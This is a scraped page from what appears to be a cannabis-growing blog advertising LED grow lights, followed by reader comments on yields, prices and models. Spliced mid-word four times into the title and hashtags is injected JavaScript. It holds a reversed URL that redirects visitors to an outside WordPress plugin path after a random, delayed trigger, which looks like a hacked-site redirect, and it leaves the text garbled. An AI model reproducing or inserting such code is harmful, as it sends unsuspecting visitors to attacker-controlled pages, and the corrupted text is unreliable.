What grow light is best for you?

Free how toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to grow weed videos

And the most powerful LEDS on the market

#dank #420girls #marijuanagram #smokegirl #smokeweedeveryday #growjournal #marijuana #budporn #420life #420photoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tography #weedporn #ledgrow #weed #cannabiscommunity #marijuanamovement #weedstagram420 #420 #potsmokers #marijuana #marijuanagram #howtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}togrowbud #dabstagram #dablife # autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toflower #growpotcheaply #perfectsunled #high

Youtube Channel

29 thoughts on “What grow light is best for you?”

  1. Charles Davy says:

    Working with hps & mhs learning as much as I can from you so we can heal the world!

  2. Lee Pearson says:

    hay man! sending you love from the uk, do you have to use a light mover, can it be done without one, and do you ship to the uk? :)x

  3. 301 H.U.S.H says:

    I'm running the minis right now and have been off one over one plant managed 136grams of dry medicine which can't be touched with only using a 125watts

  4. 301 H.U.S.H says:

    I'm going to give the Goliath a shot next and see what type of yield it's capable of. I'm a believer in results and the perfect sun definitely delivers. I recommend this light from the beginner grower to the most experienced.

  5. James Peavy says:

    I got the dwarf star and it's a beast. insanely bright and runs cool

  6. James Peavy says:

    also thanks for the advice on the problem I was having with using the dwarf star I purchased. guys this light is so powerful the seedlings were actually turning away from the light and it was almost 6.5 feet above the plants. I contacted Neil and within a few minutes he got back to me and advised me to move them to the outside edge for a little while and that did it they turned back to face the light and started setting true leaves within just a few days.

  7. GeorgeLucas says:

    Looking good Neil! great video

  8. Fred K says:

    Been looking at your vids for a while, and I'm on the brink on getting enough money to get one of your light!
    The goliath is very appealing to me, but I might start with the Dwarf first.

  9. village idiot says:

    Mars LED lights works for me.

  10. Jay b says:

    definitely gonna check your site

  11. Grow Pot Cheaply says:

    Sorry, guys, this is just to update the home page on my site. Figured the old video needed updating because now the Goliath and COB are out.

  12. Kush Arcade says:

    I fuck with the Goliath! But that haircut though lol. Keep grinding Neil!

  13. Kush Arcade says:

    When will the cobs be back?

  14. Kush Arcade says:

    I have 6 Amare Cobbs. I want to do a side by side comparison.

  15. Growing Sensationz says:

    your price is to high.

  16. Kooj c says:

    the mini is gng to b mine soon….

  17. jaime delgado says:

    great info. however… it sucks that your channel has word "cheaply" and you are featuring lights that cost a grand. Im on the tightest budget all these vids do for me is make me sad fantasizing about more stuff I can't afford

  18. Growing Sensationz says:

    Hey bud. I was looking to buy but after that comment guess not. and those vidz are not my setup dont post on tube. thx anyways waste yute

  19. Lupo Lopa says:

    Haven't seen any of these lights on European grow forums yet, I'd be happy to showcase and test one out if you want to send one my way: )
    Quantum boards seem to be blowing up over here now, I've personally seen some amazing results with two 260 watt diy kits

  20. Doctor420 Rx says:

    Hey Neil, Just waiting for my Dwarf Star to arrive. Going to Veg with that, then going to buy the Goliath to Flower.

  21. Cen Cal Grows says:

    Jesus Neil. You look like hammered dog shit bro. Are you sick ? Take better care of yourself man !!

  22. Grow Pot Cheaply says:

    Someone offered a friendly challenge, but I don't see there comment. They had a bunny for an icon. Said they have a cree COB, I think home made they think will beat the Goliath. I want to see if it does. If you see this, please make a video. Plug your light into a watt meter in the video, so I can see it uses around 600w, then raise it 2 feet above some panda plastic. Mark the 17 points of measurement as I show in my average par video, then take the 17 points in real time.

    I've been trying to beat the Goliath with COB set ups. As close as I got is the Perfect Sun COB.

  23. Llervitas 831 says:

    does a black light work ?

  24. Llervitas 831 says:

    does a black light work ?

  25. David Boyd says:

    I'm sure this is a really good light but not all of us can afford to put out $1,000. or more to buy a light of this quality tell us about some more like $100 to $300 for the light ???

  26. Kush Arcade says:

    Hey Neil, I have a question about your feed chart on your website. It says at days 8 to 15 you should be at 500 ppm. Does this include calmag or just the base? I'm using the 3 part.

  27. Norman Jones says:

    sk 600 beats that average

  28. paul stacy says:

    is 10 1600 lumen bulbs enough for a 4 x 4 room????
    I'm not worried about electricity, I just want enough light for my plants!!!

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